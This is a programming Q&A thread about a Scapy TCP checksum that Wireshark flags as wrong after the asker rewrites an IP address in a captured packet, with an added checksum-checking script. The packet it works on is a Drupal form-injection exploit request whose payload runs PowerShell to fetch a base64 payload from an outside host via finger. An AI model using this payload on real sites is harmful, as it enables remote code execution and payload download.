
I've been changing the content of packets, and setting tcp.chksum back to None at the end of it. The checksum is recalculated as expected, but when the pcap is loaded into Wireshark, the checksum is marked as incorrect.

This is my packet (I will call it tcp for now):

b"\\xfcI\\x00PZ0\\xc32\\x14\'_\\xf8P\\x18\\x01\\xf6r\\xeb\\x00\\x00POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\\r\\nHost: 240.170.0.2\\r\\nConnection: keep-alive\\r\\nAccept-Encoding: gzip, deflate\\r\\nAccept: */*\\r\\nUser-Agent: python-requests/2.18.1\\r\\nContent-Length: 201\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\n\\r\\nmail%5B%23markup%5D=powershell+%22finger+l%40240.0.0.3++++%7C+select+-Skip+2+%7Ctee+archivo.b64%22&mail%5B%23type%5D=markup&form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec"

Afterwards I do

tcp.setfieldval('chksum', None)
tcp.show2()

which gives me the following

###[ TCP ]###
  sport     = 64585
  dport     = http
  seq       = 1513145138
  ack       = 338124792
  dataofs   = 5
  reserved  = 0
  flags     = PA
  window    = 502
  chksum    = 0x72eb
  urgptr    = 0
  options   = []
###[ Raw ]###
     load      = 'POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\r\nHost: 240.170.0.2\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\nContent-Length: 201\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nmail%5B%23markup%5D=powershell+%22finger+l%40240.0.0.3++++%7C+select+-Skip+2+%7Ctee+archivo.b64%22&mail%5B%23type%5D=markup&form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec'

Once written out to a file (the whole pcap, using wrpcap), Wireshark marks it as incorrect and suggests the correct checksum is 0x72ef.

Can anyone identify if this is a bug or if there is a solution to this?

Note: The checksum recalculation works correctly on the majority of the packets I tried; this is just one of the few on which it failed.

Edit 1: As per request, the whole packet:

b"\\xfa\\x16>\\xaa\\x00\\x00\\xfa\\x16>\\x00\\x00\\x00\\x08\\x00E\\x00\\x02%.\\xc6@\\x006\\x063^\\xf0\\x00\\x00\\x02\\xf0\\xaa\\x00\\x02\\xfcI\\x00PZ0\\xc32\\x14\'_\\xf8P\\x18\\x01\\xf6`\\xd8\\x00\\x00POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\\r\\nHost: 240.170.0.2\\r\\nConnection: keep-alive\\r\\nAccept-Encoding: gzip, deflate\\r\\nAccept: */*\\r\\nUser-Agent: python-requests/2.18.1\\r\\nContent-Length: 201\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\n\\r\\nmail%5B%23markup%5D=powershell+%22finger+l%40240.0.0.3++++%7C+select+-Skip+2+%7Ctee+archivo.b64%22&mail%5B%23type%5D=markup&form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec"

Edit 2:
As requested, you can find the source code here (marked the specific function): https://github.com/Trace-Share/Trace-Manipulation/blob/04d6a6ca09a111065a9218b2818993a5b6db3b5a/TMLib/transf/PacketProcessing.py#L904-L915

Note: It should be equivalent to calling

tcp.setfieldval('load', tcp.getfieldval('load').replace(b'255.255.255.255', b'240.170.0.2'))
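Neither Scapy nor Wireshark is needed to settle which checksum value is right: the raw bytes can be re-summed independently. The following is an added example, not the asker's code or Scapy's: a pure-Python TCP checksum check over raw IPv4/TCP bytes (RFC 793 pseudo-header, RFC 1071 arithmetic), run on a constructed packet that reuses the question's addresses and TCP header values. It also shows that a pseudo-header length 4 bytes longer than the real segment (for instance an IP total length field that was not reset after shortening the payload) lowers the checksum by exactly 4, a mismatch worth ruling out whenever two tools disagree by a few units.

```python
# Added example (not the asker's or Scapy's code): independent TCP checksum check.
import struct

def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 16-bit one's-complement sum; odd-length input is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return total

def tcp_checksum(src: bytes, dst: bytes, segment: bytes, tcp_len=None) -> int:
    """TCP checksum over the RFC 793 pseudo-header + TCP header + payload.
    tcp_len defaults to the real segment length; pass a stale one to see the effect."""
    if tcp_len is None:
        tcp_len = len(segment)
    pseudo = src + dst + struct.pack("!BBH", 0, 6, tcp_len)  # zero, proto 6, TCP length
    seg = segment[:16] + b"\x00\x00" + segment[18:]          # checksum field zeroed
    return (~ones_complement_sum(pseudo + seg)) & 0xFFFF

def check_ipv4_tcp(packet: bytes) -> tuple:
    """(stored, computed) TCP checksum of a raw IPv4 packet (no Ethernet header)."""
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    segment = packet[ihl:total_len]          # TCP length = IP total length - IHL
    stored = struct.unpack("!H", segment[16:18])[0]
    return stored, tcp_checksum(packet[12:16], packet[16:20], segment)

SRC, DST = bytes([240, 0, 0, 2]), bytes([240, 170, 0, 2])   # addresses from the question
PAYLOAD = b"POST /user/register HTTP/1.1\r\nHost: 240.170.0.2\r\n\r\n"  # constructed, odd length

def build_ipv4_tcp(payload: bytes, tcp_chksum: int = 0) -> bytes:
    """Constructed IPv4/TCP packet (IP header checksum left 0, flags PSH|ACK)."""
    tcp = struct.pack("!HHIIBBHHH", 64585, 80, 1513145138, 338124792,
                      5 << 4, 0x18, 502, tcp_chksum, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     0x2EC6, 0x4000, 54, 6, 0, SRC, DST)
    return ip + tcp + payload

def demo() -> dict:
    stored, computed = check_ipv4_tcp(build_ipv4_tcp(PAYLOAD))    # checksum field still 0
    fixed_stored, fixed_computed = check_ipv4_tcp(build_ipv4_tcp(PAYLOAD, computed))
    seg = build_ipv4_tcp(PAYLOAD)[20:]
    stale = tcp_checksum(SRC, DST, seg, len(seg) + 4)   # pseudo-header length 4 too long
    return {"stored": stored, "computed": computed,
            "fixed_ok": fixed_stored == fixed_computed,
            "stale_len_delta": (computed - stale) % 0xFFFF}       # always 4
```

To test a real capture, feed check_ipv4_tcp() the IPv4 packet bytes (strip the 14-byte Ethernet header first) and compare the two values it returns with what Scapy and Wireshark report.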
  • Can you give the whole code? I am guessing there are IP and Ether layers; can you give them? What did you change in the TCP payload? Did you change its size? – fgagnaire Nov 02 '20 at 22:09
  • I changed the IP address in both the IP layer (no issue there) and the HTTP content. Size-wise, the previous IP address was a max-size IP address (as in the length of 255.255.255.255 - not the exact IP for obvious reasons). – Zerg Overmind Nov 04 '20 at 01:17
  • Also, I added the whole packet (as part of Edit 1, see above). – Zerg Overmind Nov 04 '20 at 01:20
  • I still can't see the whole code. You say you change the IP; I don't see where. – fgagnaire Nov 04 '20 at 20:29
  • There you go, I added a link to the source code on git as well as the equivalent. The HTTP class should only serve as a container for TCP.load. – Zerg Overmind Nov 04 '20 at 21:03
  • There is a lot of code in that file. What about reproducing the problem with a very small amount of code? – fgagnaire Nov 05 '20 at 15:42
  • Well, there is an example given. The code is just a framework which allows users to specify what they wish to replace. But it is basically the same as calling `.replace` on the binary content of the TCP. See the last line of code under "Note:" for the last edit. – Zerg Overmind Nov 05 '20 at 16:27
